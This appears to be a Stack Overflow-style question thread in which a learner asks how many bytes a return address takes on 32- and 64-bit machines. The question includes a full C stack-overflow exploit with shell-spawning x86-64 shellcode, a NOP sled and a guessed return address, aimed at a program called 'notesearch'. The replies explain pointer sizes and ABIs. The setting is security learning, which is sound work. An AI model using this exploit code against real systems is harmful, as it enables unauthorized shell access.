# What is the size of a return address?

Tags: buffer-overflow, shellcode

I know that this might sound a bit noobish, but I cant find this anywhere.
On a 64 bit machine, how many bytes is a return address? What about 32 bit?

The reason I am asking is because I am learning about buffer overflow exploits and I have to write an exploit. There is this program that has alloted 100 characters in a buffer but doesn't check to see if it is being overflowed. The program I have so far is:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


const char shellcode[] = 
"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";



int main(int argc, char *argv[]) {

    long int i, *ptr, ret, offset = 176;
    char *command, *buffer;

    command = (char *) malloc(200);
    memset(command, 0, 200); //Zero out the new memory

    strcpy(command, "./notesearch \'");
    buffer = command + strlen(command); // Set buffer at the end

    if(argc > 1) //Set offset
        offset = atoi(argv[1]);

    ret = ((long int) &i) - offset; //Set return address


    for(i=0; i <160; i+=8) //Fill buffer with return addres
        *((long int *)(buffer + i)) = ret;

    memset(buffer, 0x90, 60); //Build NOP sled
    memcpy(buffer+60, shellcode, sizeof(shellcode) -1);

    strcat(command, "\'");

    system(command); //Run Exploit
    free (command);
}
```

The reason I am wondering is because when i fill the buffer with the return address, I need to make sure that it is the correct size

Comment: What do you mean by this? You mean the address of the instruction that you return to when executing `return;`?

Comment: C programs do not have an explicit "return address".  Function pointers in a 64 bit address space can reasonably be expected to be 64 bits wide, and 32 bits wide in a 32 bit address space.  That applies when code and data are in the same space. I have worked with DSP chips with a separate data and program space, with different characteristics.

Comment: yes. I think that I have an idea but I'm just not 100% sure and I can't think of any way to check if I'm right @Barmar

Comment: @yasgur99 Can you cite some C reference material where you got the idea that "return address" is a C language concept? No such thing is written about in the ISO C standard, the K&R2 book and other reliable resources.

Comment: @Kaz Is the distinction between 32-bit and 64-bit machines a C language concept? Clearly he's asking about implementations, not the spec.

Comment: @Barmar  Yes, the distinction is a C concept because it influences the visible aspects of C, like how wide are various basic data types. A "return address" isn't a C concept, any more than a "carry flag", "frame pointer" or "interrupt mask".

Comment: @Kaz Buffer overflow exploits explicitly depend on invoking undefined behavior. The C standard is clearly irrelevant, it's all about implementation details.

Comment: @Barmar Everything I written so far was before seeing the edit which talks about buffer overflow.

Comment: @Kaz True, although it was pretty obvious that he was asking about something like this.

Comment: @Barmar but the whole point of writing an exploit is to control this undefined behavior and so if I place a return address that returns to the NOP sled, the shellcode will be run. to do so, I need to get the correct size of the address

Comment: In any case, buffer overflow expoits attack binary executables. You can have a bug in pure assembly language which is exploitable in the same way as C compiled code, because it stores an array on the stack, and when that array is overrun, the machine language return address on the stack is overwritten the same way. This is not a C question.

Comment: @Kaz ok I understand. thank you

Comment: @yasgur99 Basically, disassemble the code that you're attacking and everything should be more or less clear. If it is x86_64 code, it uses 8 bit pointers for code and data.  To fill a block of memory with a repeating pointer, you could just use a `void **` and then you don't hav to have a hard coded step size like 4 or 8.  The bigger issues is that we don't know whether `i` is at the top of the stack frame or bottom; and what is the meaning/justification for the hard-coded 176 "offset" variable.

Comment: @Kaz the offset value was just set at random but i can change it by setting it as a command line argument. I have Ben using seq to try all offsets 0 through 1000 and none spawn a shell

Answer (score 1, accepted):

It depends on what you mean by "64 bit machine" or "32 bit machine".

Firstly, your question is tagged C. C platform can be implemented as fairly (or completely) independent from the underlying hardware, meaning that it can use return address of any size, regardless of the machine.

Secondly, if C platform keeps close ties to the underlying hardware (as is usually the case), then on platforms with flat memory model it should be fairly straightforward: 64 bit machine means 64 bit return address; 32 bit machine means 32 bit return address.

On the other hand, on platforms with segmented memory it might depend on compiler-provided run-time memory model. For example on DOS platform for 16-bit machines return address could be 16 or 32 bit depending on selected memory model.

Comment: is there any way to tell what size the c compiler is using

Comment: @yasgur99 It presumably uses whatever the architecture's ABI says to use.